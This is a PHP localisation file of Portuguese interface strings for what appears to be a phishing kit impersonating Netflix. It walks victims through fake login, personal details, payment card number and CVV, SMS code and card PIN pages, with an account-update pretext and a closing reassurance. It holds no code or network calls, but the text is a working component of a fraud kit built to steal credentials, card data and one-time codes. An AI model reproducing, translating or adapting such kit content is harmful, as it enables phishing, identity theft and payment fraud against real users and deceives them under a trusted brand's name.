<?php
function lang($phrase){
    static $lang = array(

        "xlang" => "pt",
        "xcapt" => "Por favor, reserve um momento para resolver o hCaptcha abaixo. Isso nos ajuda a garantir que você é um usuário legítimo e não um robô, proporcionando um ambiente seguro para todos.",
        "xcapt1" => "Por favor, marque a caixa CAPTCHA.",
        "xcapt2" => "Verificação",
        "xcapt3" => "Continuar",
        "xmain1" => "Entrar",
        "xmain2" => "E-mail ou número de telefone",
        "xmain3" => "Por favor, insira um e-mail ou número de telefone válido.",
        "xmain4" => "Senha",
        "xmain5" => "Sua senha deve conter entre 4 e 60 caracteres.",
        "xmain6" => "Entrar",
        "xmain7" => "Lembrar-me",
        "xmain8" => "Precisa de ajuda?",
        "xmain9" => "Novo no Netflix?",
        "xmain10" => " Registre-se agora.",
        "xmain11" => "Esta página é protegida pelo Google reCAPTCHA para garantir que você não é um robô.",
        "xmain12" => "Saiba mais.",
        "xinfoz1" => "Informações pessoais",
        "xinfoz2" => "Nome e sobrenome",
        "xinfoz3" => "Este campo é obrigatório.",
        "xinfoz4" => "Data de nascimento",
        "xinfoz5" => "Endereço",
        "xinfoz6" => "Cidade",
        "xinfoz7" => "Código postal",
        "xinfoz8" => "Endereço de e-mail",
        "xinfoz9" => "Número de telefone",
        "xinfoz10" => "Os campos neste formulário são obrigatórios, pois precisamos dessas informações para processar sua solicitação.",
        "xinfoz11" => "Continuar",
        "xpay1" => "Configurar seu cartão de pagamento",
        "xpay2" => "Número do cartão",
        "xpay3" => "Número do cartão é obrigatório.",
        "xpay4" => "Data de validade",
        "xpay5" => "Data de validade é obrigatória.",
        "xpay6" => "CVC/CVV",
        "xpay7" => "CVC/CVV é obrigatório.",
        "xpay8" => "Criptografado de ponta a ponta",
        "xpay9" => "Continuar",
        "xsms1" => "Verificação",
        "xsms2" => "Para sua segurança, precisamos garantir que seja realmente você.",
        "xsms3" => "Enviaremos um SMS com um código de segurança",
        "xsms4" => "Por favor, insira o código recebido",
        "xsms5" => "Código SMS",
        "xsms6" => "Código SMS inválido",
        "xsms7" => "Esta etapa é necessária para processar sua solicitação com segurança.",
        "xsms8" => "Continuar",
        "xpin1" => "Verificação",
        "xpin2" => "Para sua segurança, precisamos garantir que seja realmente você.",
        "xpin3" => "Enviaremos um SMS com um código de segurança",
        "xpin4" => "Por favor, insira o PIN do seu cartão",
        "xpin5" => "PIN do cartão",
        "xpin6" => "PIN do cartão inválido",
        "xpin7" => "Esta etapa é necessária para processar sua solicitação com segurança.",
        "xpin8" => "Continuar",
        "xexpl1" => "Atualização",
        "xexpl2" => "Esperamos que esta comunicação o encontre bem. Queremos informar que é essencial atualizar suas informações em nossa plataforma para garantir uma experiência do usuário contínua e segura.",
        "xexpl3" => "Para melhorar nossos serviços e garantir a segurança de sua conta, reserve alguns minutos para atualizar suas informações.",
        "xexpl4" => "Continuar",
        "xconf1" => "Confirmação",
        "xconf2" => "Agradecemos sinceramente por dedicar tempo para atualizar suas informações em nossa plataforma. Seu compromisso com a segurança e precisão dos detalhes da sua conta é fundamental para nós.",
        "xconf3" => "Suas alterações foram salvas com sucesso. Agora você pode aproveitar completamente nossa plataforma com as informações mais recentes e atualizadas.",
        "xconf4" => "Continuar",
        "xload1" => "Processando...",
        "xload2" => "Não saia desta página.",
        "xfoot1" => "Dúvidas? Entre em contato conosco.",
        "xfoot2" => "FAQ",
        "xfoot3" => "Centro de Ajuda",
        "xfoot4" => "Termos de Uso",
        "xfoot5" => "Privacidade",
        "xfoot6" => "Preferências de Cookies",
        "xfoot7" => "Informações Corporativas",
        "xfoot8" => "Português"
    );

    return $lang[$phrase];
}
?>
